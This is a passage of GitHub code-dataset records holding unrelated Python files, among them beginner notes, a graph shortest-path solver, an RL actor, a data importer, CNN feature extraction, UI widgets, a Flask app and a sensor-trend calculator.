\".join(flavors)))\r\n\r\n\r\n\"\"\" This is how you split() items \"\"\"\r\navailable = \"banana split;hot fudge;cherry;malted;black and white\"\r\nsundaes = available.split(';')\r\nprint(sundaes)\r\n\r\nalpha = 'abcde'\r\nprint(alpha.index('a'))\r\nprint('abcde'.index('a'))\r\nprint(alpha.index('cd'))\r\n\r\n\"\"\" This is how you find the index \"\"\"\r\n\"\"\" Turns the string alpha into the list alpha_list \"\"\"\r\nalpha_list = list(alpha)\r\nprint(alpha_list)\r\nprint(alpha_list.index('b'))\r\n\r\nprint(alpha[0])\r\nprint(alpha_list[2])\r\n\r\nprint(alpha)\r\n\r\n\"\"\"Deleting from a list \"\"\"\r\ntrash = 99\r\ndel trash\r\nalpha_list = list('abcde')\r\ndel alpha_list[2]\r\nprint(alpha_list)\r\n\r\n\"\"\"\r\nDeleting from a String:\r\n1.) Turn the string into a list\r\n2.) delete from the list\r\n3.) turn the list back into a String\r\n\"\"\"\r\nletters = \"abcdefg\"\r\nletters_list = list(letters)\r\nprint(letters_list)\r\ndel(letters_list[6])\r\nprint(letters_list)\r\nnewletters = (' '.join(letters_list))\r\nprint(newletters)\r\n\r\n\r\n\r\n\"\"\" Splitting String into a list, that separates by the \";\"\r\nformat a string to connect to the sundaes variable once it has been joined\r\nas a string.
\"\"\"\r\navailable = \"banana split;hot fudge;cherry;malted;black and white\"\r\nsundaes = available.split(';')\r\nmenu = \"Our available flavors are: {}.\".format(\", \".join(sundaes))\r\nprint(menu)\r\n\r\n\"\"\" Using \"in\" with an \"if\" statement to search for the item in list,\r\nthen prints a statement based on the results \"\"\"\r\ndays_open = ['monday', 'tuesday', 'wednesday', 'thursday']\r\ntoday = 'tuesday'\r\nif today in days_open:\r\n print(\"Come on in!\")\r\nelse:\r\n print(\"Sorry, we're closed\")\r\n\r\n\"\"\" Most python developers prefer the method of \"not in\" \"\"\"\r\nif today not in days_open:\r\n print(\"sorry we're closed\")\r\n\r\n\r\n\r\n\r\n\r\n\"\"\" breaks out of loop if \"name == 'QUIT'\" \"\"\"\r\nnames = ['Ken', 'Amy', 'Devin', 'QUIT', 'Mark']\r\nfor name in names:\r\n if name == 'QUIT':\r\n break\r\n print(name)\r\n\r\n\r\n\"\"\" skipping an element in a for loop \"\"\"\r\nfor name in names:\r\n if name == \"QUIT\":\r\n continue\r\n print(name)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\"\"\" converting user input string into integer \"\"\"\r\nage = int(input(\"What's your age? \"))\r\n\r\n\r\n\r\n\"\"\" FUNCTIONS() \"\"\"\r\n\r\ndef hows_the_parrot():\r\n print(\"He's pining for the fjords\")\r\n\r\n\r\nhows_the_parrot()\r\n\r\n\r\n\"\"\" FUNCTION TAKING AN ARGUMENT \"\"\"\r\n\r\ndef lumberjack(name, action):\r\n if name.lower() =='god':\r\n print(\"Leave God out of this\")\r\n else:\r\n print(\"{} {} all day!\".format(name, action))\r\n\r\n\r\n\"\"\" calling a function while passing user input as the argument \"\"\"\r\n\r\nlumberjack(input(\"What is the name? \"), input(\"What do they do? \"))\r\n \r\n\r\n\"\"\" ?????????????????? \"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\"\"\" EXCEPTIONS \"\"\"\r\n\r\n\"\"\" CATCHING ERROR CODES FOR USERS \"\"\"\r\n\r\ntry:\r\n count = int(input(\"Give me a number: \"))\r\nexcept ValueError:\r\n print(\"That's not a number!\")\r\nelse:\r\n print(\"nuuuuuumber....\", count, \"!\")\r\n\r\n\r\n\r\n \r\n\r\n\"\"\" PYTHON COLLECTIONS \"\"\"\r\na_list = [1, 2, 3]\r\na_list.append([4,5])\r\nprint(a_list)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"DBalsimo/Python-Notes-and-Methods","sub_path":"onepytorule.py","file_name":"onepytorule.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25192031032","text":"import sys\r\nn,m = map(int, sys.stdin.readline().split())\r\ngraph = [[sys.maxsize for i in range(n)] for j in range(n)]\r\n\r\nfor i in range(m):\r\n a, b = map(int, sys.stdin.readline().split())\r\n graph[a-1][b-1] = 1\r\n graph[b-1][a-1] = 1\r\n\r\nfor k in range(n):\r\n for i in range(n):\r\n for j in range(n): \r\n if i == j:\r\n graph[i][j] = 0\r\n else:\r\n graph[i][j] = min(graph[i][j], graph[i][k] + graph[k][j])\r\n\r\nresult = []\r\nfor i in graph:\r\n result.append(sum(i))\r\nprint(result.index(min(result)) + 1)\r\n","repo_name":"2ndkite/baekjoon-python","sub_path":"1389 floydwarshall.py","file_name":"1389 floydwarshall.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21138316701","text":"import tensorflow as tf\nimport numpy as np\nimport gym\n\nfrom . import constants\nfrom . 
import util\n\nimport time\n\nclass Actor:\n def __init__(\n self,\n threadName,\n deterministic,\n envName,\n actionOperations,\n actionScaling,\n statePh,\n memoryBuffer,\n noiseScaling,\n numActions,\n numStateVariables,\n randomStartSteps,\n gamma,\n rewardScaling,\n episodeSteps,\n maxEpisodes,\n sess\n ):\n self.threadName = threadName\n self.env = gym.make(envName)\n self.sess = sess\n self.actionOperations = actionOperations\n self.statePh = statePh\n self.memoryBuffer = memoryBuffer\n self.deterministic = deterministic\n self.actionScaling = actionScaling\n self.noiseScaling = noiseScaling\n self.numActions = numActions\n self.numStateVariables = numStateVariables\n self.randomStartSteps = randomStartSteps\n self.gamma = gamma\n self.rewardScaling = rewardScaling\n self.episodeSteps = episodeSteps\n self.maxEpisodes = maxEpisodes\n self.globalStep = 0\n self.lastGlobalStep = 0\n self.lastTime = time.time()\n self.episodeRewards = []\n self.fpsOverTime = []\n def updateFps(self):\n newTime = time.time()\n timeSpent = newTime - self.lastTime\n framesRendered = self.globalStep - self.lastGlobalStep \n fps = framesRendered / timeSpent\n self.lastGlobalStep = self.globalStep\n self.lastTime = newTime\n self.fpsOverTime.append(fps)\n return fps\n def goToNextState(self,endEarly=False):\n (\n rawAction,\n actionsChosen,\n qAssessment,\n deterministicAction,\n entropy\n ) = self.sess.run(\n self.actionOperations,\n feed_dict={\n self.statePh: [self.state]\n }\n )\n actionsChosen = actionsChosen[0] if not self.deterministic else deterministicAction[0]\n actionsChosen = actionsChosen * self.actionScaling\n if not self.deterministic:\n actionsChosen += np.random.normal(loc=0.0, scale=self.noiseScaling, size=(self.numActions,))\n if self.globalStep < self.randomStartSteps:\n actionsChosen = self.env.action_space.sample()\n nextState, reward, done, info = self.env.step(actionsChosen)\n if endEarly:\n done = True\n nextState = np.reshape(nextState, [self.numStateVariables,])\n memoryEntry = np.array(np.zeros(constants.NUM_MEMORY_ENTRIES), dtype=object)\n memoryEntry[constants.STATE] = self.state\n memoryEntry[constants.ACTION] = actionsChosen\n memoryEntry[constants.REWARD] = reward * self.rewardScaling\n memoryEntry[constants.NEXT_STATE] = nextState\n memoryEntry[constants.GAMMA] = self.gamma if not done else 0\n memoryEntry[constants.IS_TERMINAL] = done\n self.state = nextState\n self.memoryBuffer.add(memoryEntry)\n self.globalStep += 1\n self.totalEpisodeReward = self.totalEpisodeReward + reward\n return done\n def episode(self):\n state = self.env.reset()\n self.state = np.reshape(state, [self.numStateVariables,])\n self.totalEpisodeReward = 0\n done = False\n for stepNum in range(self.episodeSteps):\n done = self.goToNextState()\n if done:\n break\n if not done:\n self.goToNextState(endEarly=True)\n self.episodeRewards.append(self.totalEpisodeReward)\n fps = self.updateFps()\n print(\"REWARD: \"+str(self.totalEpisodeReward)+\" FPS: \"+str(fps))\n def execute(self):\n for episode in range(self.maxEpisodes):\n self.episode()\n time.sleep(1)","repo_name":"DanielSmithMichigan/reinforcement-learning","sub_path":"soft-actor-critic-qr-dqn-distributed/agent/Actor.py","file_name":"Actor.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"36496661759","text":"from __future__ import print_function\nfrom future import standard_library\nstandard_library.install_aliases()\nfrom builtins import 
map\nfrom builtins import str\nfrom builtins import next\nfrom builtins import object\nimport shlex\nimport socket\nimport six\nfrom sqlite3 import ProgrammingError\nif six.PY2:\n from urllib.request import urlopen as urlopen\n from urllib.error import URLError as URLError\n import http.client as http_client\nelse:\n import urllib.request as urlopen\n import urllib.error as URLError\n import http.client as http_client\n\nimport metmask.parse\nfrom metmask.parse import *\n\nsocket.setdefaulttimeout(10)\n\n\nclass parserError(Exception):\n \"\"\" raised when no suitable parser could be found or the parser had problems \"\"\"\n\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return (repr(self.value))\n\n\nclass fileFormatError(Exception):\n \"\"\" raised when the file to parse does not look like expected\"\"\"\n\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return (repr(self.value))\n\n\ndef fixLine(ll, sep):\n \"\"\"turn a delimited string in to a list\n with appropriate tokens\n eg '\"a\",\"2,2\"' -> ['a', '2,2'] \n\n Parameters:\n\n -`ll`, the string\n \"\"\"\n # three exceptions to make any sure empty cells are not\n # missed, i.e. turn ',,' to ', ,'\n ll = ll.strip()\n ll = re.sub('^' + sep, ' ' + sep, ll)\n ll = re.sub(sep + '$', sep + ' ', ll)\n ll = re.sub(sep + sep, sep + ' ' + sep, ll)\n ll = re.sub(sep + sep, sep + ' ' + sep, ll)\n splitter = shlex.shlex(ll, posix=True)\n splitter.whitespace = sep\n splitter.whitespace_split = True\n res = list(splitter)\n # undo any damage we did\n res = [re.sub(sep + ' ' + \\\n sep, sep + \\\n sep, x) for x in res]\n return (res)\n\n\nclass importer(object):\n \"\"\"A class for importing information to the metmask database\n \"\"\"\n\n def __init__(self, mm,\n parsertype, fileobj, source,\n confidence='good', sep1=\",\", sep2=\"|\", na=\"[nN][Aa]\",\n resolve=True, boost=False, master='unknown', token=None):\n if not re.match(\"_\", parsertype):\n parsertype = \"_\" + parsertype\n\n if not parsertype in metmask.parse.PARSERS:\n raise parserError(\"Unknown parser\")\n\n self.token = token\n \"\"\" the chemspider security token \"\"\"\n self.master = master\n \"\"\" the master table for this imported source \"\"\"\n self.tables = []\n self.sep1 = sep1\n \"\"\" primary separator (between tables) 123-23-3,c00001\"\"\"\n self.sep2 = sep2\n \"\"\" secondary separator (between indentifiers) \n 123-23-3|234-34-4\"\"\"\n self.na = na\n \"\"\" regexp to interprete as missing value \"\"\"\n self.lineNum = 0\n \"\"\" current number of read lines \"\"\"\n self.nentries = 0\n \"\"\" current number of submitted masks\"\"\"\n self.mm = mm\n \"\"\" the database \"\"\"\n self.resolve = resolve\n \"\"\" should conflicting masks be resolved\n or merged directly \"\"\"\n self.boost = boost\n \"\"\" should masks only be added if they carry \n overlap with something already in the database \"\"\"\n self.confidence = confidence\n \"\"\"string describing the confidence\"\"\"\n self.confid = mm.addConf(confidence)\n \"\"\"the confidenceid as defined by the db\"\"\"\n\n self.fileobj = fileobj\n # if we didnt get anything (just True), assume we loop over\n # all masks in the database\n if self.fileobj is True:\n self.fileobj = iter(mm.getAllMmids())\n # if we only got a string, assume it was a filename\n if 'next' not in dir(self.fileobj):\n self.fileobj = open(self.fileobj, 'r')\n \"\"\"eventually an iterator giving the input\"\"\"\n\n self.source = source\n \"\"\"string describing the source\"\"\"\n # ugly dynamic 
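        # (Annotation added, hedged: building a source string and exec()-ing it
        # is a fragile way to load the parser plug-in selected just below. An
        # importlib-based sketch of the same lookup -- module layout assumed
        # from this file, where parsertype already carries its leading '_':
        #
        #     import importlib
        #     mod = importlib.import_module('metmask.parse.' + parsertype)
        #     self.parser = mod.parser(self)
        # )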
trick to get plug-in-esque parsers\n # the main action now happens with in \n # importer.<_parser>.parser.process\n st = \"self.parser = metmask.parse.\" + parsertype + \".parser(self)\"\n exec(st, locals(), globals())\n\n self.sourceid = mm.addSource(source, master=self.master)\n \"\"\"the sourceid as defined by the db\"\"\"\n\n # make sure that the necessary tables are in the db\n list(map(self.mm.createIdTable, self.tables))\n if master and master != 'unknown':\n self.mm.createIdTable(self.master)\n self.mm.connection.commit()\n\n def __del__(self):\n if 'close' in dir(self.fileobj):\n self.fileobj.close()\n try:\n self.mm.connection.commit()\n except ProgrammingError:\n pass\n\n def getLine(self, comment=None):\n \"\"\"safe way to get a new line\"\"\"\n try:\n ll = next(self.fileobj)\n self.lineNum = self.lineNum + 1\n if comment:\n while str(ll).startswith(comment):\n ll = next(self.fileobj)\n self.lineNum = self.lineNum + 1\n if not re.match('\\s', str(ll)):\n return (str(ll).strip())\n return (str(ll))\n except StopIteration:\n return ('')\n\n def setMask(self, ma, setass=True):\n \"\"\" set mask (ma) considering the settings of this parser\n Parameters:\n -`ma`: the mask to set\n -`setass`: should all associations be set to a new association code\n \"\"\"\n goAhead = True\n if self.boost:\n mmids = self.mm.getMmid(ma)\n if not mmids:\n goAhead = False\n if goAhead:\n if setass:\n ma.setAllAssoc(self.mm.addAss())\n self.nentries = self.nentries + self.mm.setMask(ma, self.resolve)\n\n def urlSafe(self, string):\n \"\"\"make string safe(r) for use as a url\n \"\"\"\n string = string.replace(\"%\", \"%25\")\n string = string.replace(\" \", \"+\")\n string = string.replace(\"/\", \"%2F\")\n string = string.replace(\"@\", \"%40\")\n string = string.replace(\"=\", \"%3D\")\n string = string.replace(\"[\", \"%5B\")\n string = string.replace(\"]\", \"%5D\")\n string = string.replace(\"+\", \"%2B\")\n string = string.replace(\":\", \"%3A\")\n string = string.replace(\";\", \"%3B\")\n string = string.replace(\",\", \"%2C\")\n string = string.replace(\"&\", \"%26\")\n string = string.replace(\"?\", \"%3F\")\n string = string.replace(\"<\", \"%3C\")\n string = string.replace(\">\", \"%3E\")\n string = string.replace(\"#\", \"%23\")\n return (string)\n\n def getUrl(self, url):\n \"\"\"get contents from url but do safely timeout if no response and\n ignore junk response\n \"\"\"\n try:\n return urlopen(url)\n except http_client.BadStatusLine as inst:\n if self.mm.debug:\n print(\"#COMMENT bad response skipping\")\n return (None)\n except URLError.URLError as inst:\n if self.mm.debug:\n print(\"#COMMENT no response skipping\")\n return (None)\n except socket.timeout as inst:\n if self.mm.debug:\n print(\"#COMMENT no response skipping\")\n return (None)\n","repo_name":"hredestig/metmask","sub_path":"metmask/parse/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"20993492445","text":"import keras\nimport numpy as np\nfrom keras.applications import vgg16, inception_v3, resnet50, mobilenet\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.applications.imagenet_utils import decode_predictions\nimport matplotlib\nmatplotlib.use('TkAgg')\nfrom matplotlib import pyplot as plt\nimport pdb\nimport time\nimport glob\nimport os\n\ndef filedir2batch(img_dir, NMAX):\n img_pattern = os.path.join(img_dir, '*.JPEG')\n 
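    # (Annotation added: glob.glob() returns files in arbitrary order, so the
    # sorted() below makes the batch deterministic. Hedged caveat: when
    # NMAX <= 0 the file list is not truncated, yet the batch is still
    # allocated with NMAX rows, so the write loop would raise IndexError;
    # sizing from the actual list avoids that:
    #     image_batch = np.zeros((len(img_fnames), 224, 224, 3), dtype=np.uint8)
    # )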
img_fnames = sorted(glob.glob(img_pattern))\n if NMAX > 0:\n img_fnames = img_fnames[:NMAX]\n\n image_batch = np.zeros((NMAX, 224, 224, 3), dtype=np.uint8)\n for i, img_fname in enumerate(img_fnames):\n original = load_img(img_fname, target_size=(224, 224))\n image_batch[i,:,:,:] = img_to_array(original)\n return image_batch\n\nclass cnn:\n def __init__(self, name):\n\n if name == \"mobilenet\":\n model_loader = mobilenet.MobileNet\n self.img_preprocessor = mobilenet.preprocess_input\n elif name == \"vgg16\":\n model_loader = vgg16.VGG16\n self.img_preprocessor = vgg16.preprocess_input\n elif name == \"inception_v3\":\n model_loader = inception_v3.InceptionV3\n self.img_preprocessor = inception_v3.preprocess_input\n elif name == \"resnet50\":\n model_loader = resnet50.ResNet50\n self.img_preprocessor = resnet50.preprocess_input\n else:\n raise Exception(\"unrecognized model name: \" + name)\n\n print(\"loading model \" + name)\n t1 = time.time()\n self.model = model_loader(weights='imagenet', include_top=False, pooling='avg')\n t2 = time.time()\n print(\"load time: \", t2 - t1)\n\n def predict(self, image_batch):\n if image_batch.ndim == 3:\n image_batch = np.expand_dims(image_batch, axis=0)\n processed_images = self.img_preprocessor(image_batch.copy())\n features = self.model.predict(processed_images)\n return features\n\nif __name__== \"__main__\":\n models = []\n models.append(cnn('vgg16'))\n models.append(cnn('inception_v3'))\n models.append(cnn('resnet50'))\n models.append(cnn('mobilenet'))\n \n filedir = 'imnet-val/imgs/'\n for i in [1, 2, 4, 8, 16, 32, 64, 128, 256, 512]:\n for j in range(3):\n t1 = time.time()\n image_batch = filedir2batch(filedir, i)\n for model in models:\n model.predict(image_batch)\n t2 = time.time()\n print(i, t2-t1, (t2-t1)/i)\n","repo_name":"davidtag/cs166-project","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25402017694","text":"import time\n\nfrom manage_elements import ManageTab\nfrom helper import select, fill_form_element\n\n\nclass PolicyManager(ManageTab):\n policy_entries_css_selector = \"table#policy_table > tbody > tr\"\n policy_delete_button_id = \"button_policy_delete\"\n\n TAB_INDEX = 3\n\n def clear_policies(self):\n self.open_tab()\n\n while True:\n policies = self.driver.find_elements_by_css_selector(\n self.policy_entries_css_selector)\n if not policies:\n break\n self.delete_policy(policies[0])\n time.sleep(1)\n\n def delete_policy(self, p):\n p.click()\n self.find_by_id(self.policy_delete_button_id).click()\n self.wait_for_grid_loading()\n\n def set_new_policy(self, policy):\n \"\"\"\n Create a policy using the UI elements\n \"\"\"\n self.open_tab()\n driver = self.driver\n\n policy_active_cb = self.find_by_id(\"policy_active\")\n if not policy_active_cb.is_selected():\n policy_active_cb.click()\n\n fill_form_element(driver, \"policy_name\", policy.name)\n\n scope_select = self.find_by_id('policy_scope_combo')\n select(driver, scope_select, policy.scope)\n\n fill_form_element(driver, \"policy_action\", policy.action)\n fill_form_element(driver, \"policy_realm\", policy.realm)\n fill_form_element(driver, \"policy_name\", policy.name)\n self.find_by_id(\"button_policy_add\").click()\n self.wait_for_waiting_finished()\n\n\nclass Policy(object):\n \"\"\"Creates a LinOTP Policy\"\"\"\n\n def __init__(self, manage_ui, name, scope, action, realm):\n \"\"\"Opens the LinOTP manage interface and creates 
a Policy\"\"\"\n self.name = name\n self.scope = scope\n self.action = action\n self.realm = realm\n\n manage_ui.policy_view.set_new_policy(self)\n","repo_name":"alexdutton/LinOTP","sub_path":"linotpd/src/linotp/tests/integration/linotp_selenium_helper/policy.py","file_name":"policy.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"23436270687","text":"# -*- coding: utf-8 -*-\nfrom model.group import Group\nimport random\nimport pytest\n\n\ndef test_edit_group(app, db, check_ui):\n with pytest.allure.step('Given a non-empty group list'):\n app.group.ensure_group_created(Group(name=\"test\"))\n old_groups = db.get_group_list()\n with pytest.allure.step('Given a random group from the list'):\n old_group = random.choice(old_groups)\n with pytest.allure.step('Given the new group information'):\n new_group = Group(id=old_group.id, name=\"new_name\", header=\"new_header\", footer=\"new_footer\")\n with pytest.allure.step('When I edit the group according to the new group information'):\n app.group.edit_group_by_id(old_group.id, new_group)\n with pytest.allure.step('Then the new group list is equal the old list with the updated group'):\n new_groups = db.get_group_list()\n index = -1\n for g in old_groups:\n if g.id == old_group.id:\n index = old_groups.index(g)\n break\n old_groups[index] = new_group\n assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)\n if check_ui:\n assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)\n","repo_name":"karagioz/python_training","sub_path":"test/test_edit_group.py","file_name":"test_edit_group.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3312552850","text":"import tkinter as tk\nfrom ..configure import *\n\n\nclass Label(tk.Label):\n def __init__(self, top):\n super().__init__(top)\n\n def set_text(self, text):\n self.configure(text=text)\n\n def set_color(self, color):\n self.configure(foreground=color)\n\n\nclass TitleLabel(Label):\n def __init__(self, top):\n super().__init__(top)\n self.configure(background=TL_BG,\n foreground=TL_FG,\n font=\"bold\",\n pady=7,\n anchor=\"w\")\n\n\nclass SubtitleLabel(Label):\n def __init__(self, top):\n super().__init__(top)\n self.configure(background=STL_BG,\n foreground=STL_FG,\n pady=5,\n anchor=\"w\")\n\n\nclass MessageLabel(Label):\n def __init__(self, top, text=''):\n super().__init__(top)\n self.configure(text=text,\n font=\"bold\",\n foreground=\"green\",\n pady=5,\n anchor=\"w\")\n\n\n","repo_name":"m-woj/BSPR","sub_path":"app/gui/elements/labels.py","file_name":"labels.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"35259764873","text":"import math\nfrom fractions import Fraction\n\nfrom PySide6 import QtCore, QtGui, QtWidgets\n\n\nclass Seekbar(QtWidgets.QWidget):\n seek = QtCore.Signal(float)\n step = QtCore.Signal(int)\n\n SLIDER_TIMEBASE = 1000\n SLIDER_TIMESCALE = 1.0 / SLIDER_TIMEBASE\n\n def __init__(self, config):\n super().__init__()\n\n self._slider = QtWidgets.QSlider(QtCore.Qt.Horizontal)\n self._time_lbl = QtWidgets.QLabel()\n self._time_lbl.setFont(QtGui.QFontDatabase.systemFont(QtGui.QFontDatabase.FixedFont))\n\n fw_btn = QtWidgets.QToolButton()\n fw_btn.setText(\">\")\n bw_btn = QtWidgets.QToolButton()\n 
bw_btn.setText(\"<\")\n\n layout = QtWidgets.QHBoxLayout(self)\n layout.setContentsMargins(0, 0, 0, 0)\n layout.addWidget(bw_btn)\n layout.addWidget(fw_btn)\n layout.addWidget(self._slider)\n layout.addWidget(self._time_lbl)\n\n self._frame_index = 0\n self._scene_duration = 0\n self._framerate = Fraction(*config.get(\"framerate\"))\n\n self._slider.sliderMoved.connect(self._slider_moved)\n self._slider.sliderPressed.connect(self._slider_pressed)\n self._slider.sliderReleased.connect(self._slider_released)\n self._slider_dragged = False\n\n fw_btn.clicked.connect(self._step_fw)\n bw_btn.clicked.connect(self._step_bw)\n\n @QtCore.Slot(int)\n def _slider_moved(self, value): # only user move\n if not self._scene_duration:\n return\n self.seek.emit(value * self.SLIDER_TIMESCALE)\n\n @QtCore.Slot()\n def _slider_pressed(self):\n self._slider_dragged = True\n\n @QtCore.Slot()\n def _slider_released(self):\n self._slider_dragged = False\n self._refresh()\n\n @QtCore.Slot()\n def _step_fw(self):\n self.step.emit(1)\n\n @QtCore.Slot()\n def _step_bw(self):\n self.step.emit(-1)\n\n def _get_time_lbl_text(self, frame_index, frame_time):\n cur_time = \"%02d:%02d\" % divmod(frame_time, 60)\n duration = \"%02d:%02d\" % divmod(self._scene_duration, 60)\n return \"%s / %s (%d @ %.4gHz)\" % (cur_time, duration, frame_index, self._framerate)\n\n def _adjust_time_label_size(self):\n # Make the time label flexible again\n self._time_lbl.setMinimumSize(0, 0)\n self._time_lbl.setMaximumSize(0xFFFFFF, 0xFFFFFF)\n\n # Set the label to its largest possible content (last frame)\n last_frame_index = int(math.ceil(self._scene_duration * self._framerate))\n text = self._get_time_lbl_text(last_frame_index, self._scene_duration)\n self._time_lbl.setText(text)\n\n # Probe the occupied size and make it fixed for the current scene\n hint = self._time_lbl.sizeHint()\n self._time_lbl.setFixedSize(hint)\n\n @QtCore.Slot(dict)\n def set_scene_metadata(self, cfg):\n self._scene_duration = cfg[\"duration\"]\n self._framerate = Fraction(*cfg[\"framerate\"])\n self._slider.setRange(0, self._scene_duration * self.SLIDER_TIMEBASE)\n self._adjust_time_label_size()\n self._refresh()\n\n @QtCore.Slot(int, float)\n def set_frame_time(self, frame_index, frame_time):\n self._frame_index = frame_index\n self._refresh()\n\n def _refresh(self):\n t = self._frame_index / self._framerate\n text = self._get_time_lbl_text(self._frame_index, t)\n self._time_lbl.setText(text)\n if not self._slider_dragged:\n self._slider.setValue(int(t * self.SLIDER_TIMEBASE))\n","repo_name":"gopro/gopro-lib-node.gl","sub_path":"pynodegl-utils/pynodegl_utils/ui/seekbar.py","file_name":"seekbar.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"35"} +{"seq_id":"1261855554","text":"from flask import Flask, jsonify, request, render_template\nimport urllib.request, json\n\napp = Flask(__name__)\n\napi_url = \"http://localhost:3000/db\"\n\n\nSAMPLE_DATA = []\n@app.route(\"/\", methods = ['GET'])\ndef get_articles():\n response = urllib.request.urlopen(api_url)\n data = response.read()\n result = json.loads(data)\n return render_template(\"index.html\", data=data)\n\n@app.route(\"/add\", methods = ['POST'])\ndef add_article():\n sample_data = {\n\n \"title\": \"This is the title\",\n \"body\": \"this is the body\"\n }\n return jsonify(sample_data)\n\n\nif __name__==\"__main__\":\n 
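    # (Annotation added, hedged: in get_articles() above, the response is
    # parsed into `result` but the raw bytes in `data` are what reach the
    # template; passing the parsed value is the likely intent:
    #     return render_template('index.html', data=result)
    # )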
app.run(debug=True)","repo_name":"lagunasmel/Flask-Vue-Tutorial","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35023806179","text":"'''\nAuthor: ASU Capstone Team 2018 - 2019\nDate: 26/03/2019\nDescription: Class for managing weekly data and derive weekly trends\n'''\nimport json\nimport traceback\nfrom datetime import datetime, timedelta\nfrom pymongo import MongoClient\nimport numpy as np\nfrom statistics import mean\n\nclass ReportEntry(object):\n \"\"\"docstring for ReportEntry\"\"\"\n def __init__(self, mac, name, timestamp, temperature, moisture, light, conductivity, battery):\n self.mac = mac\n self.name = name\n self.timestamp = timestamp\n self.temperature = temperature\n self.moisture = moisture\n self.light = light\n self.conductivity = conductivity\n self.battery = battery\n def toString(self):\n return json.dumps(self.__dict__)\n\nclass Slope(object):\n \"\"\"docstring for Slope\"\"\"\n def __init__(self, light, temperature, moisture, mac, field):\n self.light = light\n self.temperature = temperature\n self.moisture = moisture\n self.mac = mac\n self.field = field\n def toString(self):\n return json.dumps(self.__dict__) \n\nclass Averages(object):\n \"\"\"docstring for Averages\"\"\"\n def __init__(self, light, temperature, moisture, field):\n self.light = light\n self.temperature = temperature\n self.moisture = moisture\n self.field = field\n def toString(self):\n return json.dumps(self.__dict__) \n\nclass Trends(object):\n\n def __init__(self):\n self.todayDate = datetime.now()\n self.pastWeekStartDate = self.todayDate - timedelta(days=7)\n print(self.pastWeekStartDate)\n self.weekData = []\n self.client = MongoClient(\"mongodb://0.0.0.0:27017\")\n self.db = self.client.FarmInfo\n self.collection = self.db.sensorData\n self.sensorsCollection = self.db.sensors\n\n def toString(self):\n return json.dumps(self.__dict__, default=json_util.default)\n\n def getData(self):\n dataset = self.collection.find()\n for entry in dataset:\n self.weekData.append(entry)\n\n ''' Function to return a sensor's data for the entire week sorted by timestamp in ascending order'''\n def filterBySensor(self, sensorMac):\n query = {\"mac\": sensorMac, \"timestamp\": {\"$lt\": self.todayDate, \"$gte\": self.pastWeekStartDate}}\n sensorData = []\n result = self.collection.find(query).sort([('timestamp', 1)])\n for entry in result:\n entry['_id'] = str(entry['_id'])\n entry['timestamp'] = entry['timestamp'].timestamp()\n parsedEntry = ReportEntry(entry['mac'], entry['name_pretty'], entry['timestamp'], entry['temperature'], entry['moisture'], entry['light'], entry['conductivity'], entry['battery'])\n sensorData.append(entry)\n return sensorData\n '''Function to extract data for one value from the a sensor data'''\n def generateDataForOneValue(self, data, value):\n extractData = []\n for entry in data:\n extractData.append(entry[value])\n return extractData\n\n '''Function to get the three slopes for values in a field for a specific sensor in that field'''\n def getSlopesFromSensorData(self, data, mac, field):\n lightData = self.generateDataForOneValue(data, 'light')\n tempData = self.generateDataForOneValue(data, 'temperature')\n moistureData = self.generateDataForOneValue(data, 'moisture')\n timestampData = self.generateDataForOneValue(data, 'timestamp')\n\n light = self.calculateSlope(timestampData, lightData)\n temperature = 
self.calculateSlope(timestampData, tempData)\n moisture = self.calculateSlope(timestampData, moistureData)\n slopes = Slope(light, temperature, moisture, mac, field)\n\n '''\n UNCOMMENT BELOW TO TEST THAT DATA AND CALCULATIONS ARE RIGHT\n file = open(\"debug.txt\", \"w\")\n file.write(\"\\nFIELD:\" + field)\n file.write(\"\\n\\n\")\n file.write(\"\\n\\nLIGHT DATA\\n\")\n file.write(str(lightData))\n file.write(\"\\n\\nTEMP DATA\\n\\n\")\n file.write(str(tempData))\n file.write(\"\\n\\nMOISTURE DATA\\n\\n\")\n file.write(str(moistureData))\n file.write(\"\\n\\nTIMESTAMP DATA\\n\\n\")\n file.write(str(timestampData))\n file.write(\"\\n\\nLIGHT SLOPE:\")\n file.write(str(light))\n file.write(\"\\n\\nTEMPERATURE SLOPE:\")\n file.write(str(temperature))\n file.write(\"\\n\\nMOISTURE SLOPE:\")\n file.write(str(moisture))\n file.close()\n '''\n return slopes\n\n '''Function to generate slope from a dataset'''\n def calculateSlope(self, timeData, valueData):\n xaxis = np.array(timeData, dtype=np.float64)\n yaxis = np.array(valueData, dtype=np.float64)\n if len(yaxis) == 0 or len(xaxis) == 0:\n return 0\n slope = 